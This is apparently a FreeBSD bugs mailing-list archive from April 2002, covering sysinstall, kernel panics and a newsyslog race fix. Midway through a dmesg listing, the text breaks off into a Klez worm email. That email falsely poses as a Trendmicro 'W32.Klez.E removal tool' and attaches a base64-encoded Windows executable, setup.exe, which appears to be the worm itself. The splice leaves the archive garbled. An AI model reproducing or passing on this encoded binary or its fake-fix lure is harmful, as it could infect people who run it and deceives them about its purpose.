the body of the message From owner-freebsd-bugs Tue Apr 16 4:40:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6D3D137B419 for ; Tue, 16 Apr 2002 04:40:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3GBe1N53953; Tue, 16 Apr 2002 04:40:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AD46E37B400 for ; Tue, 16 Apr 2002 04:35:47 -0700 (PDT) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3GBZlP53123; Tue, 16 Apr 2002 04:35:47 -0700 (PDT) (envelope-from nobody) Message-Id: <200204161135.g3GBZlP53123@freefall.freebsd.org> Date: Tue, 16 Apr 2002 04:35:47 -0700 (PDT) From: Alexander Kaasjager To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/37137: FreeBSD install doesn't recognize version number/ can't find INDEX when installing from ftp. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37137 >Category: i386 >Synopsis: FreeBSD install doesn't recognize version number/ can't find INDEX when installing from ftp. >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Apr 16 04:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Alexander Kaasjager >Release: 4.4 and 4.5-RC3 >Organization: NA >Environment: misc environments on i386 >Description: When installing (e.g. extra packages) or upgrading from ftp, the release number (as set from the 'Options' screen in sysinstall) cannot be matched to one of the releases available on the ftp server. This happens with any of the mirrors, e.g. releng4, ftp.freebsd.org etc. When entering the full URL and path for the ftp server, sometimes install will succeed, but sometimes will fail with error message "INDEX could not be found". Part of the problem lies within the names of the release files. >How-To-Repeat: Run /stand/sysinstall to install/upgrade from (passive) >Fix: Use "correct", simple values for release lookup, e.g. 4.5-STABLE and have refinment done by checking the date of the file (instead of numerous files like 4.5-20020408-STABLE) >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Apr 16 5: 0: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 990C137B41A for ; Tue, 16 Apr 2002 05:00:04 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3GC04M57814; Tue, 16 Apr 2002 05:00:04 -0700 (PDT) (envelope-from gnats) Date: Tue, 16 Apr 2002 05:00:04 -0700 (PDT) Message-Id: <200204161200.g3GC04M57814@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Hiten Pandya Subject: Re: i386/37086 (Kern trap 12) Reply-To: Hiten Pandya Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR i386/37086; it has been noted by GNATS. From: Hiten Pandya To: bug-followup@FreeBSD.org Cc: Alexandr Subject: Re: i386/37086 (Kern trap 12) Date: Tue, 16 Apr 2002 04:52:03 -0700 (PDT) Have you tried increasing the value of NMBCLUSTERS, or did you try increasing the various tunables to see if that works? Also, it would be nice to have yours full spec (CPU, RAM etc.) , and kernel config. I used to get this type of seg fault when using IPFW with BRIDGE-ing under FreeBSD 4.5, but everything went OK, when I tweaked the various tunables, although this might be a different case completely. :) -- Hiten Pandya __________________________________________________ Do You Yahoo!? Yahoo! Tax Center - online filing with TurboTax http://taxes.yahoo.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Apr 16 6: 1:24 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 34D6C37B404; Tue, 16 Apr 2002 06:01:22 -0700 (PDT) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3GD1MG81183; Tue, 16 Apr 2002 06:01:22 -0700 (PDT) (envelope-from sheldonh) Date: Tue, 16 Apr 2002 06:01:22 -0700 (PDT) From: Message-Id: <200204161301.g3GD1MG81183@freefall.freebsd.org> To: sheldonh@starjuice.net, sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org, sheldonh@FreeBSD.org Subject: Re: bin/36738: [PATCH] newsyslog ownership race condition Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: [PATCH] newsyslog ownership race condition State-Changed-From-To: open->closed State-Changed-By: sheldonh State-Changed-When: Tue Apr 16 06:00:11 PDT 2002 State-Changed-Why: Committed as rev 1.41 and MFC'd as rev 1.25.2.7 in time for 4.6-RELEASE. Responsible-Changed-From-To: freebsd-bugs->sheldonh Responsible-Changed-By: sheldonh Responsible-Changed-When: Tue Apr 16 06:00:11 PDT 2002 Responsible-Changed-Why: My baby. http://www.freebsd.org/cgi/query-pr.cgi?pr=36738 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Apr 16 9: 0:54 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9061E37B41A for ; Tue, 16 Apr 2002 09:00:06 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3GG06Z46536; Tue, 16 Apr 2002 09:00:06 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A2FA937B41A for ; Tue, 16 Apr 2002 08:52:59 -0700 (PDT) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3GFqxb45148; Tue, 16 Apr 2002 08:52:59 -0700 (PDT) (envelope-from nobody) Message-Id: <200204161552.g3GFqxb45148@freefall.freebsd.org> Date: Tue, 16 Apr 2002 08:52:59 -0700 (PDT) From: "Richard S. Conto" To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/37144: panic: biodone: Zero vnode ref count ... shortly after boot from ata-disk.c Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37144 >Category: kern >Synopsis: panic: biodone: Zero vnode ref count ... shortly after boot from ata-disk.c >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Apr 16 09:00:06 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Richard S. Conto >Release: 4.5-STABLE (April 15, ~10:00 AM EDT) >Organization: Merit Network, Inc. >Environment: Doesn't stay up long enough to get a uname -a out of it. >Description: See also kern/36790 After building a kernel with the option VFS_BIO_DEBUG, I get a string of messages like this: getblk: vmioing file type 4??? and getblk: vmioing file type 2??? eventually leading to: panic: biodone: zero vnode ref count I am unable to get a kernel core dump (savecore), even though I've long had it enabled (and have successfully done so in the past.) My laptop has to be powered off/on to re-boot, so any kernel core in memory is lost. Also, this bug is corrupting my filesystems, so even if I can reboot without power on/off, and the savecore runs, the filesystem doesn't keep the data. I've instrumented 'biodone()' and 'getblk()' the way I did in pr kern/36790 and discovered that the panic is coming from ata-disk.c line 694, which is the same place as before, in `ad_interrupt()'. The 'getblk()' calls are coming from vfs_bio.c line 508, wbich is at the begining of 'bread()'. dmesg (from an older, working kernel) reports: Copyright (c) 1992-2002 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All rights reserved. FreeBSD 4.5-STABLE #1: Tue Mar 19 12:27:41 EST 2002 root@x25.family:/usr/src/sys/compile/INSPIRON3K Timecounter "i8254" frequency 1193182 Hz CPU: Pentium/P55C (quarter-micron) (200.46-MHz 586-class CPU) Origin = "GenuineIntel" Id = 0x581 Stepping = 1 Features=0x8001bf real memory = 150994944 (147456K bytes) avail memory = 142159872 (138828K bytes) Preloaded elf kernel "kernel.old" at 0xc0476000. Intel Pentium detected, installing workaround for F00F bug netsmb_dev: loaded md0: Malloc disk Using $PIR table, 3 entries at 0xc00fdf90 npx0: on motherboard npx0: INT 16 interface pcib0: on motherboard pci0: on pcib0 isab0: at device 1.0 on pci0 isa0: on isab0 atapci0: port 0xfcf0-0xfcff at device 1.1 on pci0 ata0: at 0x1f0 irq 14 on atapci0 ata1: at 0x170 irq 15 on atapci0 uhci0: at device 1.2 on pci0 uhci0: Could not map ports device_probe_and_attach: uhci0 attach returned 6 chip1: port 0x2180-0x218f at device 1.3 on pci0 pci0: at 2.0 pcic0: at device 4.0 on pci0 pcic0: PCI Memory allocated: 0x44000000 pcic0: Polling mode pcic0: TI113X PCI Config Reg: [speaker enable][CSC serial isa irq] pccard0: on pcic0 pcic1: at device 4.1 on pci0 pcic1: PCI Memory allocated: 0x44001000 pcic1: Polling mode pcic1: TI113X PCI Config Reg: [speaker enable][CSC serial isa irq] pccard1: on pcic1 orm0: W32.Klez.E is a dangerous virus that spread through email.
Trendmicro give you the W32.Klez.E removal tools

For more information,please visit http://www.Trendmicro.com
--MCcc3x781F3J4554c Content-Type: application/octet-stream; name=setup.exe Content-Transfer-Encoding: base64 Content-ID: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn GbNm+BOzPucAs1X4E7Nc+BKzJfgTs7TnGLNO+BOz5P4Vs134E7NSaWNoXPgTswAAAAAAAAAA UEUAAEwBBAC4jrc8AAAAAAAAAADgAA8BCwEGAADAAAAAkAgAAAAAAFiEAAAAEAAAANAAAAAA QAAAEAAAABAAAAQAAAAAAAAABAAAAAAAAAAAYAkAABAAAAAAAAACAAAAAAAQAAAQAAAAABAA ABAAAAAAAAAQAAAAAAAAAAAAAAAg1gAAZAAAAABQCQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ANAAAOwBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAEq6AAAAEAAAAMAAAAAQ AAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAAiEAAAANAAAAAgAAAA0AAAAAAAAAAAAAAAAAAA QAAAQC5kYXRhAAAAbF4IAADwAAAAUAAAAPAAAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAABAA AAAAUAkAEAAAAABAAQAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 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 